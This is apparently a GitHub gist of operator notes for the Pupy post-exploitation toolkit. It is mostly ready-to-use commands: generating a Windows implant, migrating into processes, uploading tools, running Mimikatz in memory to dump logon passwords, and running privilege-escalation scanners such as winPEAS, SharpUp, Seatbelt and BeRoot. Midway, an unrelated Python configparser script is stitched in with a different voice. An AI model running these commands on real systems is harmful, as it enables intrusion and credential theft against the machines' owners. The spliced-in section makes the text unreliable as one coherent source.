@ssstonebraker
Last active June 13, 2023 19:06
Pupy Post Exploitation Toolkit Notes

link to project home: https://github.com/n1nj4sec/pupy

Create aliases - modify pupy.conf

Modify pupy.conf: under the section starting with [aliases] you can add them.

[aliases]
info = get_info
pyexec = pyexec
exec = shell_exec
shell = interactive_shell
winshell = run interactive_shell
kill = process_kill
mount = drives
upload-priv = run upload "/home/kali/tools/win-priv/winpriv.zip"
mkadmin = run mkdir "c:\admin"
h = help
unzip-priv = run zip -u "c:\windows\temp\winpriv.zip"
unzip-priv-admin = run zip -u "c:\windows\temp\winpriv.zip" -d "C:\admin"
seatbelt-full = run --b shell_exec "c:\admin\seatbelt.exe all full > c:\windows\temp\seatbelt_full.txt"
seatbelt-all = run --b shell_exec "c:\admin\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"
dfull = run download "c:\windows\temp\seatbelt_full.txt"
dall = run download "c:\windows\temp\seatbelt_all.txt"
mimi32 = run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi32.txt"
mimi64 = run --b shell_exec "c:\admin\mimikatz\win64\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi64.txt"
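The `[aliases]` header suggests pupy.conf is an INI-style file (an assumption here, not something the notes state), which matters when an alias block grows by copy-paste: a repeated section header or a repeated alias name is either rejected outright or silently merged, depending on how the parser is configured. The following is an added example, not code from the gist or from the Pupy project. It reads an aliases block with Python's configparser in both modes and reports which names are defined more than once. The sample block is constructed for the example, and `parse_aliases` and `strict_parse_rejects` are names chosen here.

```python
import configparser
from typing import Dict, List, Tuple

# Constructed sample modelled on the [aliases] block in these notes (this is
# not the gist author's pupy.conf). The section header and the 'winshell'
# alias are each repeated on purpose, to show how such copy-paste duplicates
# are caught.
SAMPLE_CONF = """\
[aliases]
[aliases]
info = get_info
shell = interactive_shell
winshell = run interactive_shell
h = help
winshell = run interactive_shell
"""


def strict_parse_rejects(text: str) -> bool:
    """Return True if configparser's default strict mode refuses the file.

    Assumption: pupy.conf is an INI-style file that configparser can read.
    In strict mode a repeated section or option raises DuplicateSectionError /
    DuplicateOptionError (both subclasses of configparser.Error).
    """
    parser = configparser.ConfigParser(interpolation=None)
    try:
        parser.read_string(text)
    except configparser.Error:
        return True
    return False


def parse_aliases(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Return (effective aliases, alias names defined more than once).

    Effective aliases come from a lenient parse (strict=False, last definition
    wins), which is what makes repeated sections and options merge silently;
    the duplicate list comes from a line-level scan so the caller sees which
    names collided instead of only getting the merged result.
    """
    seen: Dict[str, int] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "aliases" and "=" in line:
            # configparser lowercases option names by default; match that.
            name = line.split("=", 1)[0].strip().lower()
            seen[name] = seen.get(name, 0) + 1
    duplicates = sorted(name for name, count in seen.items() if count > 1)

    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    aliases = dict(parser["aliases"]) if parser.has_section("aliases") else {}
    return aliases, duplicates


if __name__ == "__main__":
    print("strict mode rejects sample:", strict_parse_rejects(SAMPLE_CONF))
    aliases, dupes = parse_aliases(SAMPLE_CONF)
    for name, target in aliases.items():
        print(f"{name:10} -> {target}")
    print("duplicated alias names:", dupes)
```

Running it on the sample shows the two behaviours side by side: strict mode refuses the file, while the lenient parse returns four aliases and names `winshell` as the one defined twice. Running the same check on a real pupy.conf before starting the server catches an alias that would otherwise be overwritten by a later definition.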

Client exploits

Windows x86

gen -O windows -A x86 -f client

Interface Usage

Processes

Show processes with owner

ps -i

Migrate to pid

migrate <pid>

Sessions

Show Sessions

sessions

Set Session to interact with

session -i <id>

Shells

Windows

run interactive_shell

Linux

shell

Python

run -f 3 pyshell

Download a file

run download 'C:\Windows\System32\cmd.exe'

Upload a file

run upload '/home/kali/tools/win-priv/winPEAS32.exe'

Executables

Upload and run another PE executable from memory

32 bit Mimikatz

run memory_exec /home/kali/tools/win-exe/mimikatz/win32/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

64 bit Mimikatz

run memory_exec /home/kali/tools/win-exe/mimikatz/win64/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

Remote Desktop

rdesktop -r 0

Run File

In memory

run memory_exec /home/kali/tools/win-priv/seatbelt.exe

One-liner

run --b shell_exec "c:\windows\temp\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"

Download

run download "c:\windows\temp\seatbelt_all.txt"

Upload

run upload "/home/kali/tools/win-priv/seatbelt.exe"

Cred Dump

Mimikatz

run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\admin\mimi32.txt"

Privesc Checks

Reg1c1de

Reg1c1de: export writable keys (HKLM and HKCU)

run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hklm.csv -r=HKLM -e"
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"
run download "c:\admin\hklm_HKEY_LOCAL_MACHINE.csv"
run download "c:\admin\hkcu_HKEY_CURRENT_USER.csv"

Sharpup

run --b shell_exec "c:\admin\sharpup.exe > C:\admin\sharpup.txt"
run download "C:\admin\sharpup.txt"

Winpeas

run --b shell_exec "C:\admin\winpeas.bat > c:\admin\winpeas_output.txt"
run download "c:\admin\winpeas_output.txt"

Alternate Data Streams

dir /R
more < file.txt:root.txt:$DATA
streams.exe


Beroot

run --b shell_exec "c:\windows\temp\beroot.exe > c:\admin\beroot.txt"
